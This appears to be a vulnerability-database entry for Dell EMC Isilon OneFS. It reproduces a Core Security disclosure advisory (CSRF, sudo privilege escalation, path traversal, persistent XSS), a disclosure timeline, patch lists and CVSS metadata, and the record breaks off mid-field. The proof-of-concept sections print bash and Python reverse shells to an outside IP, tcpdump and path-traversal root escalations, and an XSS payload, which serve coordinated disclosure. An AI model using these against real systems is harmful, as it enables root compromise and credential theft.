var-201803-1423
Vulnerability from variot
Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the NDMP Page within the OneFS web administration interface. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. Dell EMC Isilon OneFS is prone to the following multiple security vulnerabilities. 1. A cross-site request-forgery vulnerability 2. A local privilege escalation vulnerability 3. A remote privilege escalation vulnerability 4. Multiple HTML-injection vulnerabilities Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user or to gain elevated root privileges and perform certain unauthorized actions and gain access to the affected application. OneFS web administration interface is one of the web management interfaces.
Note: In Isilon OneFS, running in compadmin mode, compadmin user is less privileged than the nodes' root users. A malicious user may potentially exploit these vulnerability to send unauthorized requests to the server on behalf of authenticated users of the application. CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Resolution: The following Dell EMC Isilon OneFS maintenance releases addresses these vulnerabilities (except for CVE-2018-1213):
Dell EMC Isilon OneFS 8.1.0.2
Patches are available for the below versions:
Patch-213283 for OneFS 8.1.0.2 (CVE-2018-1213 only)
Patch-217638 for OneFS 8.1.0.1 (all CVEs)
Patch-213281 for OneFS 8.1.0.0 (all CVEs)
Patch-213280 for OneFS 8.0.1.2 (all CVEs)
Patch-213278 for OneFS 8.0.0.6 (all CVEs)
Patch-217637 for OneFS 8.0.0.5 (all CVEs)
Patch-211980 for OneFS 8.0.0.4 (all CVEs)
IMPORTANT: If you update Isilon OneFS with a patch from this list, and you are using Insight IQ, you must upgrade to Insight IQ 4.1.2 prior to installing the patch.
This advisory will be updated when fixes are available for additional versions. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2
iQEcBAEBCAAGBQJar7X8AAoJEHbcu+fsE81ZnVsH/RkfP2XUz4sHV2uQofuZR2bJ 319oyT9XVWUsOwCtQQ2ty/rolXHlO/B1viIq5OYJo4sTrN9s8dupz/Patek9HdiT RR0nvSVEgLM4C8NwB30hwJO8luuO8RDQUc3BQnSo6Vy8b1zM9F7A+yMZgseUoOaW u5jduNB8kvTAAyK4SnujqyBE4eT193x2yxAr15VoMRNFlmmu+S8GHpcCMoE0CDRt 05zhC6wCelN9BA0Bf7D533ffigfP8QAe+zw/OaQgQcEmoe5ys9aaHp2EJaAF5UZN Eh5JtXuwGX3dq0GDdVgbrA0ZlQlLConpBHhZEoIn99YF4MHpbp9l3QbeEYUS2ko= =c/8F -----END PGP SIGNATURE-----
. Advisory Information
Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL: http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities Date published: 2018-02-14 Date of last update: 2018-02-14 Vendors contacted: Dell EMC Release mode: Coordinated release
- Vulnerability Information
Class: Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, CVE-2018-1202
- Vulnerability Description
Dell EMC's website states that:[1]
The EMC Isilon scale-out NAS storage platform combines modular hardware with unified software to harness unstructured data. Powered by the OneFS operating system, an EMC Isilon cluster delivers a scalable pool of storage with a global namespace.
The platform's unified software provides centralized Web-based and command-line administration to manage the following features:
-
A cluster that runs a distributed file system
-
Scale-out nodes that add capacity and performance
-
Storage options that manage files and tiering
-
Flexible data protection and high availability
-
Software modules that control costs and optimize resources
Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root. Vulnerable Packages
. Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) . Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs) . Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188, CVE-2018-1201, CVE-2018-1204, CVE-2018-1213) . https://support.emc.com/downloads/15209_Isilon-OneFS
- Credits
These vulnerabilities were discovered and researched by Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. Technical Description / Proof of Concept Code
The Web console contains several sensitive features that are vulnerable to cross-site request forgery. We describe this issue in section 7.1.
Sections 7.2 and 7.3 show two vectors to escalate privileges to root.
Various persistent cross-site scripting issues are presented in the remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). Cross-site request forgery leading to command execution
[CVE-2018-1213] There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain.
The Web console contains a plethora of sensitive actions that can be abused, such as adding new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users.
All requests are JSON-encoded, which in some cases might hinder exploitation of CSRF vulnerabilities. However, the application does not verify the content-type set. This allows an attacker to exploit the CSRF vulnerabilities by setting a text/plain content-type and sending the request body as JSON_PAYLOAD=ignored.
The following proof of concept creates a new user and assigns him a new role with enough privileges to log in via SSH, configure identifies, manage authentication providers, configure the cluster and run the remote support tools.
/-----
-----/
7.2. Privilege escalation due to incorrect sudo permissions
[CVE-2018-1203] The compadmin user can run the tcpdump binary with root privileges via sudo. This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files.
/----- pepe-1$ id uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) pepe-1$ cat /tmp/lala.sh
!/bin/bash
bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 -----/
Once the desired shell script is in place, the attacker can run tcpdump as follows to trigger the execution:
/----- pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump tcpdump: WARNING: unable to contact casperd tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size 65535 bytes /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused -----/
As can be seen below, the script runs with root privileges:
/----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 57692) bash: no job control in this shell [root@pepe-1 /compadmin]# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/
7.3. Privilege escalation via remote support scripts
[CVE-2018-1204]
From the documentation:
"OneFS allows remote support through EMC Secure Remote Services (ESRS) which monitors your EMC Isilon cluster, and with your permission, allows remote access to Isilon Technical Support personnel to gather cluster data and troubleshoot issues."
"After you enable remote support through ESRS, Isilon Technical Support personnel can request logs with scripts that gather EMC Isilon cluster data and then upload the data. The remote support scripts based on the Isilon isi_gather_info log-gathering tool are located in the /ifs/data/Isilon_Support/ directory on each node."
"Additionally, isi_phone_home, a tool that focuses on cluster- and node-specific data, is enabled once you enable ESRS. This tool is pre-set to send information about your cluster to Isilon Technical Support on a weekly basis. You can disable or enable isi_phone_home from the OneFS command-line interface."
As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo. This tool is vulnerable to a path traversal when reading the script file to run, which would enable an attacker to execute arbitrary python code with root privileges.
If remote support is not enabled, an attacker could perform the following operations in order to enable it:
/----- pepe-1$ sudo isi network subnets create 1 ipv4 1 pepe-1$ sudo isi network pools create 1.0 pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes --primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no --gateway-access-pools=1.0 -----/
The isi_phone_home tool is supposed to run scripts located in the root-only writable directory /usr/local/isi_phone_home/script. However, the provided script name is used to construct the file path without sanitization, allowing an attacker to reference other locations.
/----- def run_script(script_file_name): script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name if os.path.isfile(script_path): cmd = 'python ' + script_path + ' 2>&1 ' command_thread = command.Command(cmd) exit_code, output = command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) if exit_code: logging.error("Error: {0} running script: {1} ".format(str(exit_code), output)) else: logging.error("File: {0} list_file_name doesn't exist ".format(script_path)) -----/
The final step would be to create a malicious python script on any writable location and call it via the isi_phone_tool using sudo. Keep in mind that the previous steps are not required if the system does already have remote support enabled.
/----- pepe-1$ cat /tmp/lala.py
!/usr/bin/env python
import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.66",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
pepe-1$ sudo /usr/bin/isi_phone_home --script-file ../../../../../tmp/lala.py -----/
/----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 56807) pepe-1# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/
7.4. Persistent cross-site scripting in the cluster description
[CVE-2018-1186] The description parameter of the /cluster/identity endpoint is vulnerable to cross-site scripting.
After the cluster's description is updated, the payload will be executed every time the user opens the Web console.
/----- PUT /platform/3/cluster/identity HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: / Accept-Language: en-US,en;q=0.5 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 61 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close
{"description":"my cluster"}
-----/
7.5. Persistent cross-site scripting in the Network Configuration page
[CVE-2018-1187] The description parameter of the /network/groupnets endpoint is vulnerable to cross-site scripting.
After the description is updated, the payload will be executed every time the user opens the network configuration page.
/----- POST /platform/4/network/groupnets HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: / Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 186 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close
{"description":"lala","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} -----/
7.6. Persistent cross-site scripting in the Authentication Providers page
[CVE-2018-1188] The realm parameter of the /auth/settings/krb5/realms endpoint is vulnerable to cross-site scripting.
After the realm is updated, the payload will be executed every time the user opens the Kerberos tab of the Authentication Providers page.
/----- POST /platform/1/auth/settings/krb5/realms HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: / Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 78 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close
{"is_default_realm":true,"kdc":[],"realm":"ASDASD<img src=x onerror=alert(1)"} -----/
7.7. Persistent cross-site scripting in the Antivirus page
[CVE-2018-1189] The name parameter of the /antivirus/policies endpoint is vulnerable to cross-site scripting.
After the name is updated, the payload will be executed every time the user opens the Antivirus page.
/----- POST /platform/3/antivirus/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: / Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 172 Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06; Connection: close
{"name":"pepe","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null}
-----/
7.8. Persistent cross-site scripting in the Job Operations page
[CVE-2018-1201] The description parameter of the /job/policies endpoint is vulnerable to cross-site scripting.
After the description is updated, the payload will be executed every time the user opens the Impact Policies section of the Job Operations page.
/----- POST /platform/1/job/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 210 Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; Connection: close
{"name":"my policy","description":"","intervals":[{"begin":"Sunday
00:00","end":"Sunday
00:00","impact":"Low"},{"impact":"Low","begin":"Sunday
01:03","end":"Monday 01:01"}]}
-----/
7.9. Persistent cross-site scripting in the NDMP page
[CVE-2018-1202] The name parameter of the /protocols/ndmp/users endpoint is vulnerable to cross-site scripting.
After the name is updated, the payload will be executed every time the user opens the NDMP Settings section of the NDMP page.
/----- POST /platform/3/protocols/ndmp/users HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 64 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close
{"name":"","password":"123123"}
-----/
- Report Timeline
2017-09-25: Core Security sent an initial notification to Dell EMC, including a draft advisory. 2017-09-26: Dell EMC confirmed reception and informed an initial response would be ready by October 5th. 2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities reported except one, for which evaluation will be finalized soon. Dell EMC stated that, for the confirmed issues, a remediation plan will be provided by 10/16. 2017-10-05: Core Security thanked the follow up email. 2017-10-06: Dell EMC reported an update on one privilege escalation vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE both are equivalent to admin level access'. They said they will be updating the documentation to make it clearer. 2017-10-11: Core Security thanked for the clarification and confirmed that section will be removed from the final advisory. 2017-10-16: Core Security thanked the information and said it will analyze the proposals sent once all the data is available. 2017-10-19: Dell EMC sent a schedule for the remaining three reported vulnerabilities, with specific dates for every product's version. 2017-10-31: Core Security on the schedule sent, stating that fixing the vulnerabilities by June 2018 is unacceptable given current industry standards. Requested a review of the timeline or a thorough explanation that justifies such delay. 2017-11-01: Dell EMC answered back stating that after reviewing the original schedule, they said they believe they could have fixes ready for versions 8.0.x and 8.1.x by January 2018. Only caveat is the vulnerability 7.1 that might be pushed past January, although they said they think they could meet the January deadline. 2017-11-13: Core Security thanked Dell's review of the release dates and agreed on the proposed schedule, stating Core Security would like to publish a single advisory for all the vulnerabilities reported. Also requested CVE IDs for each of the issues. 2018-01-16: Core Security asked for a status update on the release date for the fixes since there was no update from Dell EMC. 2018-01-17: Dell EMC answered back stating they are awaiting confirmation from the product team about the exact dates of release. They said they will get back to us by the end of this week. Dell EMC also asked our GPG public key again. 2018-01-18: Core Security thanked for the update and sent the advisory's public GPG key. 2018-01-19: Dell EMC stated they are currently working on drafting their advisory and will send it back to us (including CVEs) once they have the necessary approvals. 2018-01-23: Dell EMC asked for our updated draft advisory. 2018-01-25: Dell EMC notified that the team are targeting to have the fix available by February 12th. Additionally, Dell will send its draft advisory by January 31th. 2018-01-29: Core Security thanked for the update and proposed February 14th as publication date. 2018-01-31: Dell EMC informed Core Security that they agreed to release on February 14th. They also provided CVE IDs for each vulnerability reported. 2018-02-01: Dell EMC sent its draft advisory. 2018-02-14: Advisory CORE-2017-0009 published. References
[1] https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-1423",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "emc isilon",
"scope": "eq",
"trust": 1.6,
"vendor": "dell",
"version": "7.1.1.11"
},
{
"model": "emc isilon",
"scope": "gte",
"trust": 1.0,
"vendor": "dell",
"version": "8.0.0.0"
},
{
"model": "emc isilon",
"scope": "lte",
"trust": 1.0,
"vendor": "dell",
"version": "8.0.0.6"
},
{
"model": "emc isilon",
"scope": "lte",
"trust": 1.0,
"vendor": "dell",
"version": "8.0.1.2"
},
{
"model": "emc isilon",
"scope": "lte",
"trust": 1.0,
"vendor": "dell",
"version": "8.1.0.1"
},
{
"model": "emc isilon",
"scope": "gte",
"trust": 1.0,
"vendor": "dell",
"version": "8.0.1.0"
},
{
"model": "emc isilon",
"scope": "gte",
"trust": 1.0,
"vendor": "dell",
"version": "8.1.0.0"
},
{
"model": "isilon onefs",
"scope": "eq",
"trust": 0.8,
"vendor": "dell emc old emc",
"version": "7.1.1.11"
},
{
"model": "isilon onefs",
"scope": "eq",
"trust": 0.8,
"vendor": "dell emc old emc",
"version": "8.0.0.0 to 8.0.0.6"
},
{
"model": "isilon onefs",
"scope": "eq",
"trust": 0.8,
"vendor": "dell emc old emc",
"version": "8.0.1.0 to 8.0.1.2"
},
{
"model": "isilon onefs",
"scope": "eq",
"trust": 0.8,
"vendor": "dell emc old emc",
"version": "8.1.0.0 to 8.1.0.1"
},
{
"model": "emc isilon onefs",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "8.1.1.0"
},
{
"model": "emc isilon onefs",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "8.1.0.1"
},
{
"model": "emc isilon onefs",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "8.1.0.0"
},
{
"model": "emc isilon onefs",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "8.0.1.2"
},
{
"model": "emc isilon onefs",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "8.0.1.0"
},
{
"model": "emc isilon onefs",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "8.0.0.6"
},
{
"model": "emc isilon onefs",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "8.0.0.0"
},
{
"model": "emc isilon onefs",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "7.2.1.0"
},
{
"model": "emc isilon onefs",
"scope": "eq",
"trust": 0.3,
"vendor": "dell",
"version": "7.1.1.11"
}
],
"sources": [
{
"db": "BID",
"id": "103033"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003447"
},
{
"db": "NVD",
"id": "CVE-2018-1202"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-922"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:dell:emc_isilon:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "8.1.0.1",
"versionStartIncluding": "8.1.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:dell:emc_isilon:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "8.0.1.2",
"versionStartIncluding": "8.0.1.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:dell:emc_isilon:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "8.0.0.6",
"versionStartIncluding": "8.0.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:dell:emc_isilon:7.1.1.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-1202"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services.",
"sources": [
{
"db": "BID",
"id": "103033"
}
],
"trust": 0.3
},
"cve": "CVE-2018-1202",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-1202",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "VHN-121937",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.8,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-1202",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-1202",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-922",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-121937",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-121937"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003447"
},
{
"db": "NVD",
"id": "CVE-2018-1202"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-922"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the NDMP Page within the OneFS web administration interface. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user\u0027s browser session in the context of the OneFS website. Dell EMC Isilon OneFS is prone to the following multiple security vulnerabilities. \n1. A cross-site request-forgery vulnerability\n2. A local privilege escalation vulnerability\n3. A remote privilege escalation vulnerability\n4. Multiple HTML-injection vulnerabilities\nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user or to gain elevated root privileges and perform certain unauthorized actions and gain access to the affected application. OneFS web administration interface is one of the web management interfaces. \n\nNote: In Isilon OneFS, running in compadmin mode, compadmin user is less privileged than the nodes\u0027 root users. A malicious user may potentially exploit these vulnerability to send unauthorized requests to the server on behalf of authenticated users of the application. \nCVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\nResolution:\t\nThe following Dell EMC Isilon OneFS maintenance releases addresses these vulnerabilities (except for CVE-2018-1213): \n\nDell EMC Isilon OneFS 8.1.0.2\n\nPatches are available for the below versions: \n\nPatch-213283 for OneFS 8.1.0.2 (CVE-2018-1213 only)\n\nPatch-217638 for OneFS 8.1.0.1 (all CVEs)\n\nPatch-213281 for OneFS 8.1.0.0 (all CVEs)\n\nPatch-213280 for OneFS 8.0.1.2 (all CVEs)\n\nPatch-213278 for OneFS 8.0.0.6 (all CVEs)\n\nPatch-217637 for OneFS 8.0.0.5 (all CVEs)\n\nPatch-211980 for OneFS 8.0.0.4 (all CVEs)\n\nIMPORTANT: If you update Isilon OneFS with a patch from this list, and you are using Insight IQ, you must upgrade to Insight IQ 4.1.2 prior to installing the patch. \n\nThis advisory will be updated when fixes are available for additional versions. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG 